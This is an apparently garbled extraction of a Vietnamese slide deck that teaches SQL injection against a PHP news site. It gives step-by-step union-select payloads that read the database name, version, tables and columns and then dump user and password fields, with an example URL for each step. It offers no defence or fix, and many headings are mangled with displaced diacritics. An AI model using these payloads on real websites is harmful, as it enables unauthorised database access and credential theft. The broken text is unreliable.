GI I THI UỚ Ệ
LỖI BẢO MẬT WEBSITE SQL
INJECTION
NHỮNG BƯỚC CẦN LÀM ĐỂ KHAI THÁC SQL INJECTION
XÁC ĐỊNH XEM WEB ĐÓ CÓ BỊ DÍNH LỖI SQL INJECTION HAY
KHÔNG
NẾU KHÔNG DÍNH THÌ NGHỈ CHƠI
NẾU DÍNH THÌ TIẾP TỤC CHƠI TIẾP
CÁC B C TH C HI N KHI WEBSITE B L IƯỚ Ự Ệ Ị Ỗ
L Y TÊN DATABASEẤ
XÁC ĐỊNH VERSION CỦA DATABASE
XÁC ĐỊNH CÁC TABLES CỦA DATABASE
XÁC ĐỊNH CÁC COLUMN CỦA TỪNG TABLE
LẤY THÔNG TIN
CÁC B C TH C HI N KHI WEBSITE B L IƯỚ Ự Ệ Ị Ỗ
L Y TÊN DATABASEẤ
XÁC ĐỊNH VERSION CỦA DATABASE
XÁC ĐỊNH CÁC TABLES CỦA DATABASE
XÁC ĐỊNH CÁC COLUMN CỦA TỪNG TABLE
LẤY THÔNG TIN
CÁCH NH N BI T WEBSITE B L I SQL Ậ Ế Ị Ỗ
INJECTION
THÊM DẤU NHÁY ĐƠN VÀO SAU ID
/>
THÔNG BÁO LỖI
Warning: mysql_fetch_assoc(): supplied argument is not a valid
MySQL result resource in /data/home/dbteo/htdocs/tintuc.php
on line 25
DEMO
XÁC ĐỊNH CÁC CỘT GÂY RA
LỖI SQL INJECTION
CÚ PHÁP:
Thêm dấu trừ trước id và câu lệnh sql phía sau
id
VÍ DỤ:
union select all 1,2,3,4
DEMO
TH CHO Đ N KHI CÓ K T QU TR V LÀ CÁC Ử Ế Ế Ả Ả Ề
C T GÂY NÊN L I SQLỘ Ỗ
KẾT QUẢ NHƯ SAU:
XÁC ĐỊNH TÊN DATABASE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,database(),6,7,8,…y from
information_schema.tables where table_schema =
database()
VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,database(),6,7,8,9,10,11 from
information_schema.tables where table_schema =
database()
DEMO
XÁC ĐỊNH VERSION CỦA
DATABASE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,version(),6,7,8,…y from information_schema.tables
where table_schema = database()
VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,version(),6,7,8,9,10,11 from
information_schema.tables where table_schema =
database()
DEMO
XÁC ĐỊNH CÁC B NG C A Ả Ủ
DATABSE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(table_name),6,7,8,…y from
information_schema.tables where table_schema =
database()
VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(table_name),6,7,8,9,10,11 from
information_schema.tables where table_schema =
database()
DEMO
XÁC ĐỊNH CÁC C T C A CÁC Ộ Ủ
TABLE
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(column_name),6,7,8,…y from
information_schema.columns where table_schema =
database()
VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from
information_schema.columns where table_schema =
database()
DEMO
XÁC ĐỊNH THÔNG TIN C A C A Ủ Ủ
CÁC C TỘ
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(tên cột user,tên cột pass),6,7,8,
…y from tên bảng chứa cột user và pass
VÍ DỤ
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(user,pass),6,7,8,9,10,11 from
users
DEMO
XÁC ĐỊNH THÔNG TIN C A CÁC Ủ
C T – CÁCH KHÁCỘ
CÚ PHÁP:
Tên web site/loại tin?id=-x union select all
1,2,3,4,group_concat(column_name),6,7,8,…y from
information_schema.columns where table_schema =
database() and table_name = 0x mã hex của tên bảng chứa
user và pass
VÍ DỤ:
webcuateo.com/tintuc.php?id=-12 union select all
1,2,3,4,group_concat(column_name),6,7,8,9,10,11 from
information_schema.columns where table_schema =
database() and table_name = 0x51746d696f
DEMO
TỔNG KẾT